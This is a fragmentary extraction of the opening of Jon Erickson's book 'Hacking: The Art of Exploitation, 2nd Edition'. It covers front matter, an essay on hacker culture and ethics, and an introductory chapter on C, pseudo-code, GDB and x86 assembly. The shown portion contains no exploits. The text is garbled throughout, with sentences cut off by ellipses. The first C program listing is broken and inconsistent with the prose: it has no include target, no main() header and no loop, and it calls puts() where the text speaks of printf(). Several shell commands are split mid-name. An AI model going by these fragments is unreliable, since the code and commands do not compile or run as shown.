Title: Hacking : The Art of Exploitation
Description: Title: Hacking The Art of Exploitation. Edition: 2nd Edition. Author: Jon Erickson.


Hacking: The Art of Exploitation, 2nd
Edition
Jon Erickson
Editor
William Pollock
Copyright © 2010

HACKING: THE ART OF EXPLOITATION, 2ND EDITION
...

All rights reserved
...

Printed on recycled paper in the United States of America
11 10 09 08 07
1 2 3 4 5 6 7 8 9
ISBN-10: 1-59327-144-1
ISBN-13: 978-1-59327-144-2
Publisher:

William Pollock

Production Editors:

Christina Samuell and Megan Dunchak

Cover Design:

Octopod Studios

Developmental Editor: Tyler Ortman
Technical Reviewer:

Aaron Adams

Copyeditors:

Dmitry Kirsanov and Megan Dunchak

Compositors:

Christina Samuell and Kathleen Mish

Proofreader:

Jim Brook

Indexer:

Nancy Guenther

For information on book distributors or translations, please contact No Starch
Press, Inc
...

555 De Haro Street, Suite 250, San Francisco, CA 94107
phone: 415
...
9900; fax: 415
...
9950; info@nostarch
...
nostarch
...
-- 2nd ed
...
cm
...
Computer security
...
Computer hackers
...
Computer networks--Security measures
...
Title
...
9
...
8--dc22
2007042910

No Starch Press and the No Starch Press logo are registered trademarks of No
Starch Press, Inc
...
Rather than use a trademark symbol
with every occurrence of a trademarked name, we are using the names only in an
editorial fashion and to the benefit of the trademark owner, with no intention of
infringement of the trademark
...

While every precaution has been taken in the preparation of this work, neither
the author nor No Starch Press, Inc
...

ACKNOWLEDGMENTS
I would like to thank Bill Pollock and everyone else at No Starch Press for making
this book a possibility and allowing me to have so much creative control in the
process
...
Seidel
for keeping me interested in the science of computer science, my parents for
buying that first Commodore VIC-20, and the hacker community for the
innovation and creativity that produced the techniques explained in this book
...
Understanding
hacking techniques is often difficult, since it requires both breadth and depth of
knowledge
...
This second edition of Hacking: The Art of
Exploitation makes the world of hacking more accessible by providing the complete
picture—from programming to machine code to exploitation
...

This CD contains all the source code in the book and provides a development and
exploitation environment you can use to follow along with the book's examples
and experiment along the way
...
INTRODUCTION
The idea of hacking may conjure stylized images of electronic vandalism,
espionage, dyed hair, and body piercings
...
Granted, there are people out there who use hacking techniques to
break the law, but hacking isn't really about that
...
The essence of hacking is finding unintended
or overlooked uses for the laws and properties of a given situation and then
applying them in new and inventive ways to solve a problem—whatever it may be
...
Each number must be used once and only once, and you may
define the order of operations; for example, 3 * (4 + 6) + 1 = 31 is valid,
however incorrect, since it doesn't total 24
...
Like the solution to this problem (shown on the last page of this book),
hacked solutions follow the rules of the system, but they use those rules in
counterintuitive ways
...

Since the infancy of computers, hackers have been creatively solving problems
...
The club's members used this equipment to rig up a
complex system that allowed multiple operators to control different parts of the
track by dialing in to the appropriate sections
...
The group moved on to programming on punch cards and ticker
tape for early computers like the IBM 704 and the TX-0
...
A new program that
could achieve the same result as an existing one but used fewer punch cards was
considered better, even though it did the same thing
...

Being able to reduce the number of punch cards needed for a program showed an
artistic mastery over the computer
...
Early
hackers proved that technical problems can have artistic solutions, and they
thereby transformed programming from a mere engineering task into an art
form
...
The few who got
it formed an informal subculture that remained intensely focused on learning and
mastering their art
...
Such obstructions
included authority figures, the bureaucracy of college classes, and discrimination
...
This drive to continually
learn and explore transcended even the conventional boundaries drawn by
discrimination, evident in the MIT model railroad club's acceptance of 12-year-old
Peter Deutsch when he demonstrated his knowledge of the TX-0 and his desire to
learn
...

The original hackers found splendor and elegance in the conventionally dry
sciences of math and electronics
...
Their desire to dissect
and understand wasn't intended to demystify artistic endeavors; it was simply a
way to achieve a greater appreciation of them
...

This is not a new cultural trend; the Pythagoreans in ancient Greece had a similar
ethic and subculture, despite not owning computers
...
That thirst for
knowledge and its beneficial byproducts would continue on through history, from
the Pythagoreans to Ada Lovelace to Alan Turing to the hackers of the MIT model
railroad club
...

How does one distinguish between the good hackers who bring us the wonders of
technological advancement and the evil hackers who steal our credit card
numbers? The term cracker was coined to distinguish evil hackers from the good
ones
...
Hackers stayed true to the Hacker Ethic, while
crackers were only interested in breaking the law and making a quick buck
...
Cracker was meant to be the catch-all label for anyone doing anything
unscrupulous with a computer: pirating software, defacing websites, and worst
of all, not understanding what they were doing
...

The term's lack of popularity might be due to its confusing etymology: cracker
originally described those who crack software copyrights and reverse engineer
copy-protection schemes
...
Few technology
journalists feel compelled to use terms that most of their readers are unfamiliar
with
...

Similarly, the term script kiddie is sometimes used to refer to crackers, but it just
doesn't have the same zing as the shadowy hacker
...

The current laws restricting cryptography and cryptographic research further
blur the line between hackers and crackers
...
This
paper responded to a challenge issued by the Secure Digital Music Initiative
(SDMI) in the SDMI Public Challenge, which encouraged the public to attempt to
break these watermarking schemes
...
The Digital Millennium
Copyright Act (DMCA) of 1998 makes it illegal to discuss or provide technology
that might be used to bypass industry consumer controls
...
He had
written software to circumvent overly simplistic encryption in Adobe software and
presented his findings at a hacker convention in the United States
...
Under the law, the
complexity of the industry consumer controls doesn't matter—it would be
technically illegal to reverse engineer or even discuss Pig Latin if it were used as
an industry consumer control
...

The sciences of nuclear physics and biochemistry can be used to kill, yet they also
provide us with significant scientific advancement and modern medicine
...
Even if we wanted to, we couldn't suppress the knowledge of how to
convert matter into energy or stop the continued technological progress of
society
...
Hackers will constantly be pushing the limits of
knowledge and acceptable behavior, forcing us to explore further and further
...
Just as
the speedy gazelle adapted from being chased by the cheetah, and the cheetah
became even faster from chasing the gazelle, the competition between hackers
provides computer users with better and stronger security, as well as more
complex and sophisticated attack techniques
...
The defending hackers create IDSs to add to their arsenal, while the
attacking hackers develop IDS-evasion techniques, which are eventually
compensated for in bigger and better IDS products
...

The intent of this book is to teach you about the true spirit of hacking
...
Included with this book is a bootable LiveCD
containing all the source code used herein as well as a preconfigured Linux
environment
...
The only requirement is
an x86 processor, which is used by all Microsoft Windows machines and the newer
Macintosh computers—just insert the CD and reboot
...
This way, you will gain a hands-on understanding and
appreciation for hacking that may inspire you to improve upon existing techniques
or even to invent new ones
...

Chapter 0x200
...
Even
though these two groups of hackers have different end goals, both groups use
similar problem-solving techniques
...
There are interesting hacks found in both the
techniques used to write elegant code and the techniques used to exploit
programs
...

The hacks found in program exploits usually use the rules of the computer to
bypass security in ways never intended
...

There are actually an infinite number of programs that can be written to
accomplish any given task, but most of these solutions are unnecessarily large,
complex, and sloppy
...

Programs that have these qualities are said to have elegance, and the clever and
inventive solutions that tend to lead to this efficiency are called hacks
...

In the business world, more importance is placed on churning out functional code
than on achieving clever hacks and elegance
...
While time and memory
optimizations go without notice by all but the most sophisticated of users, a new
feature is marketable
...

True appreciation of programming elegance is left for the hackers: computer
hobbyists whose end goal isn't to make a profit but to squeeze every possible bit
of functionality out of their old Commodore 64s, exploit writers who need to write
tiny and amazing pieces of code to slip through narrow security cracks, and
anyone else who appreciates the pursuit and the challenge of finding the best
possible solution
...
Since an understanding of programming is a prerequisite to
understanding how programs can be exploited, programming is a natural starting
point
...
A program is nothing more
than a series of statements written in a specific language
...

Driving directions, cooking recipes, football plays, and DNA are all types of
programs
...
Continue on Main Street until you see
a church on your right
...
Otherwise, you can just continue and make a right on 16th Street
...
Drive straight
down Destination Road for 5 miles, and then you'll see the house on the right
...

Anyone who knows English can understand and follow these driving directions,
since they're written in English
...

But a computer doesn't natively understand English; it only understands machine
language
...
However, machine language is arcane and difficult to work
with—it consists of raw bits and bytes, and it differs from architecture to
architecture
...
Programming like this is
painstaking and cumbersome, and it is certainly not intuitive
...
An assembler is one form of machine-language translator—it is a
program that translates assembly language into machine-readable code
...
However, assembly
language is still far from intuitive
...
Just as machine language for Intel x86
processors is different from machine language for Sparc processors, x86 assembly
language is different from Sparc assembly language
...
If a program is written in x86 assembly language, it
must be rewritten to run on Sparc architecture
...

These problems can be mitigated by yet another form of translator called a
compiler
...
High-level languages are much more intuitive than assembly language and can be
converted into many different types of machine language for different processor
architectures
...
C, C++, and
Fortran are all examples of high-level languages
...

Pseudo-code
Programmers have yet another form of programming language called pseudocode
...
It isn't understood by compilers, assemblers, or any
computers, but it is a useful way for a programmer to arrange instructions
...
It's sort of the nebulous missing link between English and high-level
programming languages like C
...

Control Structures
Without control structures, a program would just be a series of instructions
executed in sequential order
...
The driving
directions included statements like, Continue on Main Street until you see a church on your
right and If the street is blocked because of construction…
...

If-Then-Else
In the case of our driving directions, Main Street could be under construction
...
Otherwise, the
original set of instructions should be followed
...
In general, it looks something like this:
If (condition) then
{
  Set of instructions to execute if the condition is met;
}
Else
{
  Set of instructions to execute if the condition is not met;
}

For this book, a C-like pseudo-code will be used, so every instruction will end with
a semicolon, and the sets of instructions will be grouped with curly braces and
indentation
...
In C and many
other programming languages, the then keyword is implied and therefore left out,
so it has also been omitted in the preceding pseudo-code
...
These types of syntactical differences in
programming languages are only skin deep; the underlying structure is still the
same
...
Since C will
be used in the later sections, the pseudo code used in this book will follow a C-like
syntax, but remember that pseudo-code can take on many forms
...
For the
sake of readability, it's still a good idea to indent these instructions, but it's not
syntactically necessary
...

If (there is only one instruction in a set of instructions)
  The use of curly braces to group the instructions is optional;
Else
{
  The use of curly braces is necessary;
  Since there must be a logical way to group these instructions;
}

Even the description of a syntax itself can be thought of as a simple program
...

While/Until Loops
Another elementary programming concept is the while control structure, which is
a type of loop
...
A program can accomplish this task through looping, but it requires a
set of conditions that tells it when to stop looping, lest it continue into infinity
...
A simple program for a hungry mouse could look something like this:
While (you are hungry)
{
  Find some food;
  Eat the food;
}

The set of two instructions following the while statement will be repeated while the
mouse is still hungry
...
Similarly, the number of times the set
of instructions in the while statement is executed changes depending on how
much food the mouse finds
...
An until loop is simply a
while loop with the conditional statement inverted
...
The driving
directions from before contained the statement Continue on Main Street until you see a
church on your right
...

While (there is not a church on the right)
  Drive down Main Street;

For Loops
Another looping control structure is the for loop
...
The driving
direction Drive straight down Destination Road for 5 miles could be converted to a for loop
that looks something like this:
For (5 iterations)
  Drive straight for 1 mile;

In reality, a for loop is just a while loop with a counter
...
The first section declares the counter and sets
it to its initial value, in this case 0
...
The third
and final section describes what action should be taken on the counter during
each iteration
...

Using all of the control structures, the driving directions from What Is
Programming? can be converted into a C-like pseudo-code that looks something
like this:
Begin going East on Main Street;
While (there is not a church on the right)
  Drive down Main Street;
If (street is blocked)
{
  Turn right on 15th Street;
  Turn left on Pine Street;
  Turn right on 16th Street;
}
Else
  Turn right on 16th Street;
Turn left on Destination Road;
For (i=0; i<5; i++)
  Drive straight for 1 mile;
Stop at 743 Destination Road;

More Fundamental Programming Concepts
In the following sections, more universal programming concepts will be
introduced
...
As I introduce these concepts, I will integrate them into
pseudo-code examples using C-like syntax
...

Variables
The counter used in the for loop is actually a type of variable
...

There are also variables that don't change, which are aptly called constants
...
In pseudo code, variables are simple
abstract concepts, but in C (and in many other languages), variables must be
declared and given a type before they can be used
...
Like a cooking recipe that
lists all the required ingredients before giving the instructions, variable
declarations allow you to make preparations before getting into the meat of the
program
...
In the
end though, despite all of the variable type declarations, everything is all just
memory
...
Some of the most common types are int (integer
values), float (decimal floating-point values), and char (single character values)
...

int a, b;
float k;
char z;

The variables a and b are now defined as integers, k can accept floating point
values (such as 3
...

Variables can be assigned values when they are declared or anytime afterward,
using the = operator
...
14;
z = 'w';
b = a + 5;

After the preceding instructions are executed, the variable a will contain the value
of 13, k will contain the number 3
...
Variables are simply a way to
remember values; however, with C, you must first declare each variable's type
...
In C,
the following symbols are used for various arithmetic operations
...
Modulo reduction may seem like a
new concept, but it's really just taking the remainder after division
...

Also, since the variables a and b are integers, the statement b = a / 5 will result
in the value of 2 being stored in b, since that's the integer portion of it
...
6
...
The C
language also provides several forms of shorthand for these arithmetic
operations
...

Full Expression   Shorthand     Explanation
i = i + 1         i++ or ++i    Add 1 to the variable
...

These shorthand expressions can be combined with other arithmetic operations to
produce more complex expressions
...
The first expression means Increment the value of i by 1 after
evaluating the arithmetic operation, while the second expression means Increment the value
of i by 1 before evaluating the arithmetic operation
...

int a, b;
a = 5;
b = a++ * 6;

At the end of this set of instructions, b will contain 30 and a will contain 6, since
the shorthand of b = a++ * 6; is equivalent to the following statements:
b = a * 6;
a = a + 1;

However, if the instruction b = ++a * 6; is used, the order of the addition to a
changes, resulting in the following equivalent instructions:
a = a + 1;
b = a * 6;

Since the order has changed, in this case b will contain 36, and a will still contain
6
...
For example, you
might need to add an arbitrary value like 12 to a variable, and store the result
right back in that variable (for example, i = i + 12)
...

Full Expression   Shorthand   Explanation
i = i + 12        i+=12       Add some value to the variable
...

i = i * 12        i*=12       Multiply some value by the variable
...

Comparison Operators
Variables are frequently used in the conditional statements of the previously
explained control structures
...
In C, these comparison operators use a shorthand syntax that
is fairly common across many programming languages
...
This is an important distinction, since the
double equal sign is used to test equivalence, while the single equal sign is used to
assign a value to a variable
...
(Some
programming languages like Pascal actually use := for variable assignment to
eliminate visual confusion
...
This symbol can be used by itself to invert any expression
...

Logic   Symbol   Example
OR      ||       ((a < b) || (a < c))
AND     &&       ((a < b) && !(a < c))

The example statement consisting of the two smaller conditions joined with OR
logic will fire true if a is less than b, OR if a is less than c
...
These statements should be
grouped with parentheses and can contain many different variations
...
Returning to the example of the mouse searching for food, hunger can
be translated into a Boolean true/false variable
...

While (hungry == 1)
{
  Find some food;
  Eat the food;
}

Here's another shorthand used by programmers and hackers quite often
...
In fact, the comparison
operators will actually return a value of 1 if the comparison is true and a value of
0 if it is false
...
Since the program only uses
these two cases, the comparison operator can be dropped altogether
...

While ((hungry) && !(cat_present))
{
  Find some food;
  If(!(food_is_on_a_mousetrap))
    Eat the food;
}

This example assumes there are also variables that describe the presence of a cat
and the location of the food, with a value of 1 for true and 0 for false
...

Functions
Sometimes there will be a set of instructions the programmer knows he will need
several times
...
In other languages, functions are known as subroutines or
procedures
...

The driving directions from the beginning of this chapter require quite a few
turns; however, listing every little instruction for every turn would be tedious (and
less readable)
...
In this case, the function is passed the
direction of the turn
...
When a
program that knows about this function needs to turn, it can just call this function
...
Either left or right can be passed into this
function, which causes the function to turn in that direction
...
For those familiar with
functions in mathematics, this makes perfect sense
...

In C, functions aren't labeled with a "function" keyword; instead, they are
declared by the data type of the variable they are returning
...
If a function is meant to return an integer
(perhaps a function that calculates the factorial of some number x), the function
could look like this:
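int factorial(int x)
{
  int i, result = 1;
  for(i=2; i <= x; i++)  // multiply together every value up to x
    result *= i;         // accumulate separately so the loop bound x never changes
  return result;
}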

This function is declared as an integer because it multiplies every value from 1 to
x and returns the result, which is an integer
...
This
factorial function can then be used like an integer variable in the main part of any
program that knows about it
...

Also in C, the compiler must "know" about functions before it can use them
...
A function prototype is simply a way to tell
the compiler to expect a function with this name, this return data type, and these
data types as its functional arguments
...
An example of a function prototype for the factorial()
function would look something like this:
int factorial(int);

Usually, function prototypes are located near the beginning of a program
...
The only thing the compiler cares about is the function's
name, its return data type, and the data types of its functional arguments
...
However, the
turn() function doesn't yet capture all the functionality that our driving
directions need
...
This means that a turning function should have two variables: the direction
to turn and the street to turn on to
...
A more complete
turning function using proper C-like syntax is listed below in pseudo-code
...
It will continue to look for
and read street signs until the target street is found; at that point, the remaining
turning instructions will be executed
...

Begin going East on Main Street;
while (there is not a church on the right)
  Drive down Main Street;
if (street is blocked)
{
  Turn(right, 15th Street);
  Turn(left, Pine Street);
  Turn(right, 16th Street);
}
else
  Turn(right, 16th Street);
Turn(left, Destination Road);
for (i=0; i<5; i++)
  Drive straight for 1 mile;
Stop at 743 Destination Road;

Functions aren't commonly used in pseudo-code, since pseudo-code is mostly used
as a way for programmers to sketch out program concepts before writing
compilable code
...
But in a programming language like C, functions are used heavily
...

Getting Your Hands Dirty
Now that the syntax of C feels more familiar and some fundamental programming
concepts have been explained, actually programming in C isn't that big of a step
...
Linux is a free operating system that everyone has access to, and
x86-based processors are the most popular consumer-grade processor on the
planet
...

Included with this book is a Live CD you can use to follow along if your computer
has an x86 processor
...
It
will boot into a Linux environment without modifying your existing operating
system
...

Let's get right to it
...
c program is a simple piece of C code that will
print "Hello, world!" 10 times
...
c
#include ...

{
puts("Hello, world!\n"); // put the string to the output
...

}

The main execution of a C program begins in the aptly named main() function
...

The first line may be confusing, but it's just C syntax that tells the compiler to
include headers for a standard input/output (I/O) library named stdio
...
It is located at
/usr/include/stdio
...
Since the main() function
uses the printf() function from the standard I/O library, a function prototype is
needed for printf() before it can be used
...
h header file
...
The rest of the code should make sense and
look a lot like the pseudo-code from before
...
It should be fairly obvious
what this program will do, but let's compile it using GCC and run it just to make
sure
...
The outputted translation is an
executable binary file, which is called a
...
Does the compiled
program do what you thought it would?
reader@hacking:~/booksrc $ gcc firstprog
...
out
-rwxr-xr-x 1 reader reader 6621 2007-09-06 22:16 a
...
/a
...
Most introductory programming classes just teach how to
read and write C
...
Most programmers learn the language from the top down and never see
the big picture
...
To see the bigger picture in the realm of programming,
simply realize that C code is meant to be compiled
...
Thinking of C-source as
a program is a common misconception that is exploited by hackers every day
...
out's instructions are written in machine language, an elementary
language the CPU can understand
...
In this case, the processor is in a family that uses the x86
architecture
...

Each architecture has a different machine language, so the compiler acts as a
middle ground—translating C code into machine language for the target
architecture
...
But a hacker realizes that the compiled program is
what actually gets executed out in the real world
...
We
have seen the source code for our first program and compiled it into an
executable binary for the x86 architecture
...
Let's start by looking at the machine
code the main() function was translated into
...
out | grep -A20 main
...
Each byte is represented in
hexadecimal notation, which is a base-16 numbering system
...
Hexadecimal uses 0 through 9 to represent 0 through 9, but it also
uses A through F to represent the values 10 through 15
...

This means a byte has 256 (2^8) possible values, so each byte can be described
with 2 hexadecimal digits
...
The bits of the machine language instructions must be put somewhere,
and this somewhere is called memory
...

Like a row of houses on a local street, each with its own address, memory can be
thought of as a row of bytes, each with its own memory address
...
Older Intel x86 processors use a 32-bit addressing scheme,
while newer ones use a 64-bit one
...
84467441 x
10^19) possible addresses
...

The hexadecimal bytes in the middle of the listing above are the machine
language instructions for the x86 processor
...

But since 0101010110001001111001011000001111101100111100001 … isn't very useful to
anything other than the processor, the machine code is displayed as hexadecimal
bytes and each instruction is put on its own line, like splitting a paragraph into
sentences
...
The instructions on the far
right are in assembly language
...
The instruction
ret is far easier to remember and make sense of than 0xc3 or 11000011
...
This
means that since every processor architecture has different machine language
instructions, each also has a different form of assembly language
...
Exactly how these machine language instructions are
represented is simply a matter of convention and preference
...
The assembly
shown in the output on The Bigger Picture is AT&T syntax, as just about all of
Linux's disassembly tools use this syntax by default
...
The same code can be shown in Intel
syntax by providing an additional command-line option, -M intel, to objdump, as
shown in the output below
...
out | grep -A20 main
...
Regardless of
the assembly language representation, the commands a processor understands
are quite simple
...
These operations move memory around, perform some sort of basic
math, or interrupt the processor to get it to do something else
...
But in the same way millions of books have
been written using a relatively small alphabet of letters, an infinite number of
possible programs can be created using a relatively small collection of machine
instructions
...
Most of the
instructions use these registers to read or write data, so understanding the
registers of a processor is essential to understanding the instructions
...

The x86 Processor
The 8086 CPU was the first x86 processor
...
If you remember people talking about 386 and
486 processors in the '80s and '90s, this is what they were referring to
...
I could just talk abstractly about these registers now, but I think it's
always better to see things for yourself
...
Debuggers are used by programmers to step through
compiled programs, examine program memory, and view processor registers
...

Similar to a microscope, a debugger allows a hacker to observe the microscopic
world of machine code—but a debugger is far more powerful than this metaphor
allows
...

Below, GDB is used to show the state of the processor registers right before the
program starts
...
/a
...
so
...

(gdb) break main

Breakpoint 1 at 0x804837a
(gdb) run
Starting program: /home/reader/booksrc/a
...
Exit anyway? (y or n) y
reader@hacking:~/booksrc $

A breakpoint is set on the main() function so execution will stop right before our
code is executed
...

The first four registers (EAX, ECX, EDX, and EBX) are known as general purpose
registers
...
They are used for a variety of purposes, but they mainly act as
temporary variables for the CPU when it is executing machine instructions
...
These stand for
Stack Pointer, Base Pointer, Source Index, and Destination Index, respectively
...
These registers are fairly important
to program execution and memory management; we will discuss them more later
...

There are load and store instructions that use these registers, but for the most
part, these registers can be thought of as just simple general-purpose registers
...
Like a child pointing his finger at each word
as he reads, the processor reads each instruction using the EIP register as its
finger
...
Currently, it points to a memory address at 0x804838a
...
The actual memory is split into
several different segments, which will be discussed later, and these registers keep
track of that
...

Assembly Language
Since we are using Intel syntax assembly language for this book, our tools must be
configured to use this syntax
...
You
can configure this setting to run every time GDB starts up by putting the
command in the file
...

reader@hacking:~/booksrc $ gdb -q
(gdb) set dis intel
(gdb) quit
reader@hacking:~/booksrc $ echo "set dis intel" > ~/
...
gdbinit
set dis intel
reader@hacking:~/booksrc $

Now that GDB is configured to use Intel syntax, let's begin understanding it
...
The operations are usually intuitive mnemonics: The mov operation will
move a value from the source to the destination, sub will subtract, inc will
increment, and so forth
...

8048375: 89 e5 mov ebp,esp
8048377: 83 ec 08 sub esp,0x8

There are also operations that are used to control the flow of execution
...
The example below first compares a 4-byte value located at EBP
minus 4 with the number 9
...
If that value is less than
or equal to 9, execution jumps to the instruction at 0x8048393
...
If the value
isn't less than or equal to 9, execution will jump to 0x80483a6
...

The -g flag can be used by the GCC compiler to include extra debugging
information, which will give GDB access to the source code
...
c
reader@hacking:~/booksrc $ ls -l a
...
out
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/libthread_db
...
1"
...
h>
2
3 int main()
4 {
5 int i;
6 for(i=0; i < 10; i++)
7 {
8 printf("Hello, world!\n");
9 }
10 }
(gdb) disassemble main
Dump of assembler code for function main():
0x08048384 : push ebp
0x08048385 : mov ebp,esp
0x08048387 : sub esp,0x8
0x0804838a : and esp,0xfffffff0
0x0804838d : mov eax,0x0
0x08048392 : sub esp,eax
0x08048394 : mov DWORD PTR [ebp-4],0x0

0x0804839b : cmp DWORD PTR [ebp-4],0x9
0x0804839f : jle 0x80483a3
0x080483a1 : jmp 0x80483b6
0x080483a3 : mov DWORD PTR [esp],0x80484d4
0x080483aa : call 0x80482a8 <_init+56>
0x080483af : lea eax,[ebp-4]
0x080483b2 : inc DWORD PTR [eax]
0x080483b4 : jmp 0x804839b
0x080483b6 : leave
0x080483b7 : ret
End of assembler dump
...
c, line 6
...
out
Breakpoint 1, main() at firstprog
...
Then a breakpoint is set at the start of main(), and the program is run
...
Since the breakpoint has been set at the start of the
main() function, the program hits the breakpoint and pauses before actually
executing any instructions in main()
...

Notice that EIP contains a memory address that points to an instruction in the
main() function's disassembly (shown in bold)
...
Part of the reason variables need to be declared in C is to aid the
construction of this section of code
...
We'll talk more about
the function prologue later, but for now we can take a cue from GDB and skip it
...
Examining memory is a critical skill for any
hacker
...
In both magic
and hacking, if you were to look in just the right spot, the trick would be obvious
...
But
with a debugger like GDB, every aspect of a program's execution can be
deterministically examined, paused, stepped through, and repeated as often as
needed
...

The examine command in GDB can be used to look at a certain address of memory
in a variety of ways
...

The display format also uses a single-letter shorthand, which is optionally
preceded by a count of how many items to examine
...

x Display in hexadecimal
...

t Display in binary
...
In the following example, the current address of the EIP register is used
...

(gdb) i r eip
eip 0x8048384 0x8048384
(gdb) x/o 0x8048384
0x8048384 : 077042707
(gdb) x/x $eip
0x8048384 : 0x00fc45c7
(gdb) x/u $eip
0x8048384 : 16532935
(gdb) x/t $eip
0x8048384 : 00000000111111000100010111000111
(gdb)

The memory the EIP register is pointing to can be examined by using the address
stored in EIP
...
The value 077042707 in octal is the same as 0x00fc45c7 in hexadecimal, which is
the same as 16532935 in base-10 decimal, which in turn is the same as
00000000111111000100010111000111 in binary
...

(gdb) x/2x $eip
0x8048384 : 0x00fc45c7 0x83000000
(gdb) x/12x $eip
0x8048384 : 0x00fc45c7 0x83000000 0x7e09fc7d 0xc713eb02
0x8048394 : 0x84842404 0x01e80804 0x8dffffff 0x00fffc45
0x80483a4 : 0xc3c9e5eb 0x90909090 0x90909090 0x5de58955
(gdb)

The default size of a single unit is a four-byte unit called a word
...
The valid size letters are as follows:
b A single byte
h A halfword, which is two bytes in size
w A word, which is four bytes in size
g A giant, which is eight bytes in size

This is slightly confusing, because sometimes the term word also refers to 2-byte
values
...
In this book,
words and DWORDs both refer to 4-byte values
...
The following GDB output shows memory
displayed in various sizes
...
The first
examine command shows the first eight bytes, and naturally, the examine
commands that use bigger units display more data in total
...
This same byte-reversal effect can be seen when a full four-byte
word is shown as 0x00fc45c7, but when the first four bytes are shown byte by
byte, they are in the order of 0xc7, 0x45, 0xfc, and 0x00
...
For example, if four bytes
are to be interpreted as a single value, the bytes must be used in reverse order
...
Revisiting these values displayed both as hexadecimal and
unsigned decimals might help clear up any confusion
...
Exit anyway? (y or n) y
reader@hacking:~/booksrc $ bc -ql
199*(256^3) + 69*(256^2) + 252*(256^1) + 0*(256^0)
3343252480
0*(256^3) + 252*(256^2) + 69*(256^1) + 199*(256^0)
16532935
quit
reader@hacking:~/booksrc $

The first four bytes are shown both in hexadecimal and standard unsigned
decimal notation
...
The byte order of a given architecture is an important
detail to be aware of
...

In addition to converting byte order, GDB can do other conversions with the
examine command
...
The examine
command also accepts the format letter i, short for instruction, to display the
memory as disassembled assembly language instructions
...
/a
...
so
...

(gdb) break main
Breakpoint 1 at 0x8048384: file firstprog
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:6
6 for(i=0; i < 10; i++)
(gdb) i r $eip
eip 0x8048384 0x8048384
(gdb) x/i $eip
0x8048384 : mov DWORD PTR [ebp-4],0x0
(gdb) x/3i $eip
0x8048384 : mov DWORD PTR [ebp-4],0x0
0x804838b : cmp DWORD PTR [ebp-4],0x9
0x804838f : jle 0x8048393
(gdb) x/7xb $eip
0x8048384 : 0xc7 0x45 0xfc 0x00 0x00 0x00 0x00
(gdb) x/i $eip
0x8048384 : mov DWORD PTR [ebp-4],0x0
(gdb)

In the output above, the a
...
Since the EIP register is pointing to memory that actually contains
machine language instructions, they disassemble quite nicely
...

8048384: c7 45 fc 00 00 00 00 mov DWORD PTR [ebp-4],0x0

This assembly instruction will move the value of 0 into memory located at the
address stored in the EBP register, minus 4
...
Basically, this command will zero out the variable i for the for
loop
...
The memory at this location can be examined several different ways
...
The
examine command can examine this memory address directly or by doing the
math on the fly
...
This variable named $1
can be used later to quickly re-access a particular location in memory
...

Let's execute the current instruction using the command nexti, which is short for
next instruction
...

(gdb) nexti
0x0804838b 6 for(i=0; i < 10; i++)
(gdb) x/4xb $1
0xbffff804: 0x00 0x00 0x00 0x00
(gdb) x/dw $1
0xbffff804: 0
(gdb) i r eip
eip 0x804838b 0x804838b
(gdb) x/i $eip
0x804838b : cmp DWORD PTR [ebp-4],0x9

(gdb)

As predicted, the previous command zeroes out the 4 bytes found at EBP minus 4,
which is memory set aside for the C variable i
...
The next few instructions actually make more sense to talk about in a
group
...
The next instruction, jle
stands for jump if less than or equal to
...
In this case the instruction says to jump to the
address 0x8048393 if the value stored in memory for the C variable i is less than
or equal to the value 9
...
This will cause the EIP to
jump to the address 0x80483a6
...
The first address of
0x8048393 (shown in bold) is simply the instruction found after the fixed jump
instruction, and the second address of 0x80483a6 (shown in italics) is located at
the end of the function
...

(gdb) nexti
0x0804838f 6 for(i=0; i < 10; i++)
(gdb) x/i $eip
0x804838f : jle 0x8048393
(gdb) nexti
8 printf("Hello, world!\n");
(gdb) i r eip
eip 0x8048393 0x8048393
(gdb) x/2i $eip
0x8048393 : mov DWORD PTR [esp],0x8048484
0x804839a : call 0x80482a0
(gdb)

As expected, the previous two instructions let the program execution flow down to
0x8048393, which brings us to the next two instructions
...
But what is ESP pointing to?

(gdb) i r esp
esp 0xbffff800 0xbffff800
(gdb)

Currently, ESP points to the memory address 0xbffff800, so when the mov
instruction is executed, the address 0x8048484 is written there
...

(gdb) x/2xw 0x8048484
0x8048484: 0x6c6c6548 0x6f57206f
(gdb) x/6xb 0x8048484
0x8048484: 0x48 0x65 0x6c 0x6c 0x6f 0x20
(gdb) x/6ub 0x8048484
0x8048484: 72 101 108 108 111 32
(gdb)

A trained eye might notice something about the memory here, in particular the
range of the bytes
...
These bytes fall within the printable ASCII
range
...
The bytes 0x48, 0x65, 0x6c,
and 0x6f all correspond to letters in the alphabet on the ASCII table shown below
...

ASCII Table

Oct Dec Hex Char Oct Dec Hex Char
-----------------------------------------------------------
000 0 00 NUL '\0' 100 64 40 @
001 1 01 SOH 101 65 41 A
002 2 02 STX 102 66 42 B
003 3 03 ETX 103 67 43 C
004 4 04 EOT 104 68 44 D
005 5 05 ENQ 105 69 45 E
006 6 06 ACK 106 70 46 F
007 7 07 BEL '\a' 107 71 47 G
010 8 08 BS '\b' 110 72 48 H
011 9 09 HT '\t' 111 73 49 I
012 10 0A LF '\n' 112 74 4A J
013 11 0B VT '\v' 113 75 4B K
014 12 0C FF '\f' 114 76 4C L
015 13 0D CR '\r' 115 77 4D M
016 14 0E SO 116 78 4E N
017 15 0F SI 117 79 4F O
020 16 10 DLE 120 80 50 P
021 17 11 DC1 121 81 51 Q
022 18 12 DC2 122 82 52 R
023 19 13 DC3 123 83 53 S
024 20 14 DC4 124 84 54 T
025 21 15 NAK 125 85 55 U
026 22 16 SYN 126 86 56 V

027 23 17 ETB 127 87 57 W
030 24 18 CAN 130 88 58 X
031 25 19 EM 131 89 59 Y
032 26 1A SUB 132 90 5A Z
033 27 1B ESC 133 91 5B [
034 28 1C FS 134 92 5C \ '\\'
035 29 1D GS 135 93 5D ]
036 30 1E RS 136 94 5E ^
037 31 1F US 137 95 5F _
040 32 20 SPACE 140 96 60 `
041 33 21 ! 141 97 61 a
042 34 22 " 142 98 62 b
043 35 23 # 143 99 63 c
044 36 24 $ 144 100 64 d
045 37 25 % 145 101 65 e
046 38 26 & 146 102 66 f
047 39 27 ' 147 103 67 g
050 40 28 ( 150 104 68 h
051 41 29 ) 151 105 69 i
052 42 2A * 152 106 6A j
053 43 2B + 153 107 6B k
054 44 2C , 154 108 6C l
055 45 2D - 155 109 6D m
056 46 2E
...
The c format letter can be used to automatically look up a byte on
the ASCII table, and the s format letter will display an entire string of character
data
...
This string is the argument for the printf()
function, which indicates that moving the address of this string (0x8048484) to the
address stored in ESP has something to do with this function
...

